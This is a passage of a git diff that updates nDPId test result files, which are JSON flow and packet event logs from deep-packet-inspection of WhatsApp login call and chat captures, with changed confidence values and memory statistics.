+00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432582267983,"flow_last_seen":1432582311138,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":360,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"91.253.176.65","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582245413,"flow_last_seen":1432582245576,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.8","src_port":49167,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582245413,"flow_last_seen":1432582245576,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.8","src_port":49167,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582235999,"flow_last_seen":1432582236282,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.59","src_port":49180,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 
00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582235999,"flow_last_seen":1432582236282,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.59","src_port":49180,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582235998,"flow_last_seen":1432582236282,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.37","src_port":49181,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582235998,"flow_last_seen":1432582236282,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.37","src_port":49181,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1432582284805,"flow_last_seen":1432582285047,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip6","src_ip":"fe80::da30:62ff:fe56:1c","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} -00836{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1432582258587,"flow_last_seen":1432582267438,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":660,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"1.194.90.191","src_port":51518,"dst_port":60312,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
-00600{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":53,"flow_first_seen":1432582230648,"flow_last_seen":1432582264928,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15484,"flow_avg_l4_payload_len":292,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49204,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00600{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1432582355253,"flow_last_seen":1432582356195,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7941,"flow_avg_l4_payload_len":248,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1432582284805,"flow_last_seen":1432582285047,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip6","src_ip":"fe80::da30:62ff:fe56:1c","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} 
+00836{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1432582258587,"flow_last_seen":1432582267438,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":660,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"1.194.90.191","src_port":51518,"dst_port":60312,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00844{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":53,"flow_first_seen":1432582230648,"flow_last_seen":1432582264928,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15484,"flow_avg_l4_payload_len":292,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49204,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.AppleStore","breed":"Safe","category":"SoftwareUpdate"}} 
+00844{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1432582355253,"flow_last_seen":1432582356195,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7941,"flow_avg_l4_payload_len":248,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.AppleStore","breed":"Safe","category":"SoftwareUpdate"}} 00581{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","packets-captured":1253,"packets-processed":1251,"total-skipped-flows":0,"total-l4-payload-len":132660,"total-not-detected-flows":0,"total-guessed-flows":20,"total-detected-flows":37,"total-detection-updates":9,"total-updates":0,"current-active-flows":0,"total-active-flows":57,"total-idle-flows":57,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":348,"global_ts_msec":1432582361929} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1253/1251 
@@ -354,9 +354,9 @@ ~~ total active/idle flows...: 57/57 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5993905 bytes -~~ total memory freed........: 5993905 bytes -~~ total allocations/frees...: 119599/119599 +~~ total memory allocated....: 6127539 bytes +~~ total memory freed........: 6127539 bytes +~~ total allocations/frees...: 122361/122361 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 466 chars ~~ json string max len.......: 2437 chars diff --git a/test/results/whatsapp_login_chat.pcap.out b/test/results/whatsapp_login_chat.pcap.out index d440e4cb1..e140b9a96 100644 --- a/test/results/whatsapp_login_chat.pcap.out +++ b/test/results/whatsapp_login_chat.pcap.out 
@@ -2,52 +2,52 @@ 00559{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1432582377898} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582377898,"flow_last_seen":1432582377898,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432582377898,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1432582377898,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1432582377898,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAABI56kAAEARDKvAqAIBwKgC\/+EV4RUANKgAU3BvdFVkcDCYJeGQmjjiDQABAARIlcID1NylhjSgAeWF26p2NNVFJFGe2SE="} 
-00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582377898,"flow_last_seen":1432582377898,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432582377898,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582377898,"flow_last_seen":1432582377898,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432582377898,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582379543,"flow_last_seen":1432582379543,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1432582379543,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":61697,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1432582379543,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1432582379543,"pkt":"xiwDYGpkAPS5Jrv0CABFAAA+Df0AAEAR51zAqAIEwKgCAfEBADUAKg3CrIsBAAABAAAAAAAAA2UxMgh3aGF0c2FwcANuZXQAAAEAAQ=="} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582379543,"flow_last_seen":1432582379543,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1432582379543,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":61697,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"},"dns": {"query":"e12.whatsapp.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582379543,"flow_last_seen":1432582379543,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1432582379543,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":61697,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"},"dns": 
{"query":"e12.whatsapp.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1432582379571,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":204,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":204,"pkt_l4_len":170,"thread_ts_msec":1432582379571,"pkt":"APS5Jrv0xiwDYGpkCABFAAC+Me8AAEARwurAqAIBwKgCBAA18QEAqrdkrIuBgAABAAgAAAAAA2UxMgh3aGF0c2FwcANuZXQAAAEAAcAMAAEAAQAAAiQABLitsy\/ADAABAAEAAAIkAASeVTpnwAwAAQABAAACJAAEuK2zLMAMAAEAAQAAAiQABLitsyPADAABAAEAAAIkAARsqLDGwAwAAQABAAACJAAEnlU6NMAMAAEAAQAAAiQABJ5VOg\/ADAABAAEAAAIkAASeVTol"} -00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1432582379543,"flow_last_seen":1432582379571,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":196,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1432582379571,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":61697,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"},"dns": {"query":"e12.whatsapp.net","num_queries":1,"num_answers":8,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"184.173.179.47"}} 
+00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1432582379543,"flow_last_seen":1432582379571,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":196,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1432582379571,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":61697,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"},"dns": {"query":"e12.whatsapp.net","num_queries":1,"num_answers":8,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"184.173.179.47"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582379591,"flow_last_seen":1432582379591,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432582379591,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"158.85.58.15","src_port":49206,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1432582379591,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1432582379591,"pkt":"xiwDYGpkAPS5Jrv0CABFAABAjylAAEAGEH7AqAIEnlU6D8A2FGYksXJ9AAAAALAC\/\/+BgwAAAgQFtAEDAwQBAQgKLfyAogAAAAAEAgAA"} 
00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1432582379745,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1432582379745,"pkt":"APS5Jrv0xiwDYGpkCABFAAA8XOEAADUGjcqeVToPwKgCBBRmwDYfJVHSJLFyfqAS\/\/8RNgAAAgQFrAEDAwkEAggKXZ2yry38gKI="} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1432582379848,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582379848,"pkt":"xiwDYGpkAPS5Jrv0CABFAAA0bGhAAEAGM0vAqAIEnlU6D8A2FGYksXJ+HyVR04AQIFgeowAAAQEICi38gaNdnbKv"} -00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1432582379591,"flow_last_seen":1432582380392,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":166,"flow_tot_l4_payload_len":166,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1432582380392,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"158.85.58.15","src_port":49206,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
+00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1432582379591,"flow_last_seen":1432582380392,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":166,"flow_tot_l4_payload_len":166,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1432582380392,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"158.85.58.15","src_port":49206,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582381179,"flow_last_seen":1432582381179,"flow_idle_time":7580000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1432582381179,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
02415{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1432582381179,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1494,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1494,"pkt_l4_len":1460,"thread_ts_msec":1432582381179,"pkt":"xiwDYGpkAPS5Jrv0CABFAAXIltFAAEAGh5\/AqAIEEa1CZsA1Abt+clmMpMYxPVAQQABXnAAAFwMDB3i+HiPgShCayKsiCSxppt+UVMG6sNLf32XwXp\/5y1\/Gi93F3S41DWF8\/kCqCE3bWkUsOQ\/D44TQ+2n51pbyMSPLw0aW5BBc1KN+NXFB6c0\/EvLUkiCkXMNnoBikvRGoWqnT3MsBLR3ifxEfJkx0KA0FgI9JutlWbXDDUTzCRBEZTuRft2ygLhc453pAbiPG9v0WPMDLHXiyCBIVg\/B5dK4qKFD6E2UMKFMhu4mZRR2j\/6qxWlXTvDrMGoz+8Qo7VA74VXDOmIIqRacL+CmsjHCFgzIlevE9HbzQStt3waOocRqfRvIAnyjErcnsgCXougYuTv7e+MXADNmAZBilIIoi3Uil6da7kvrxaXQ4p+uZdx7Gy5yoHJv8xUlpNlf\/6TnuDJ0Sr34mxp2ViDhiTjdQbwAa3oxSYIriERZCD+iy2XBPrLEva6gxIYSFoMA1nMvNEDvwHAwVpPX12H1IQq6zqjIg+g2T3TBZpcZ71NLHtrlkBg9o5NZd7LL0MCoUc5LF5gFQhEphIEtekSiwBF\/vWaUkYpAxP7LvgNiCoLKAfwM9RyhmY\/groOK8zq86A8Z\/A5kmVimU2YKg3RBFJIj4fY5ZjJv5w7NZlJ5I4tkbJJp4AoKwuThn7szdjjoI\/Gz6k3Cz8YZmXMOwDviwyDpLeaUvIrJPOa1ciNsy0vHmM7ukkMbC8Ej95C27cDvULH7dL6T0XGOtlAh\/1i8BfnuG9hN4cxa\/b+5gAAhOFw1eAAyMGcUy23P+89rorZ3KMrek+vuNcICgkwnazh1Z5AFtIzlWlMfxbaxy\/+pJoR3DnO0EuyOOHz4IdCogPPXsieGyIHTaGzpebRd3ow8OikTIF2RiPLnkFeI25KqwWpGL6weTaFVmxqKuafYQNbLXqeb1mf\/DlBl7xTHdJ\/K7sh+ashtIQDjtOnXuANeb1sDwla5nv+DnrsBoezknxm9kI8r\/CTGWQN\/tTHUBQ3JnQu2sU3BgKQv67idjs6\/xEGKN0fSceO\/OmdSiRN4eY5AKeqGiRb0iQcOp0eoO0nHkil+B5uKPiznWHrrsTIB9dEBiXQpdbXNu0tyB5osy9qzKMkf\/o9uJ+QSQ5cIo7DjRzFZnpJOkCxvvXWU+FpzDhZxIpMTrOA0QqAGTa21N2fhnR7KTBe68GBzD362LyujtxvtI68Y+e4qwU8QRYv94bSptDA1mC5d7hLaair0kLj5FJuw9fQYw56jdCBuIztl42Q9ip+eJzWCXzcqrMuxyZhMkusneUAU213bxe7LIroTzopLTvDr1KXzVypQq1ZP5NCiggcKfqeKZidfD+aXqLGRh7olUlGpaHuqy1maaxpidAIrK\/rniCznE3Y8bsAPAq11XlkH+mjEIj4B5Et\/0lF+xCPP+z5E9ZGqKuPoSIYCKQzbemYTMMkhnWOl6BB5kOc48mQHXcM\/HEeMKQ4qb33pU8bbK3Mr9Vb0pzxFXpDLLr1AV4WOOsDEdqZRvrHbAGGit7Ox3Y
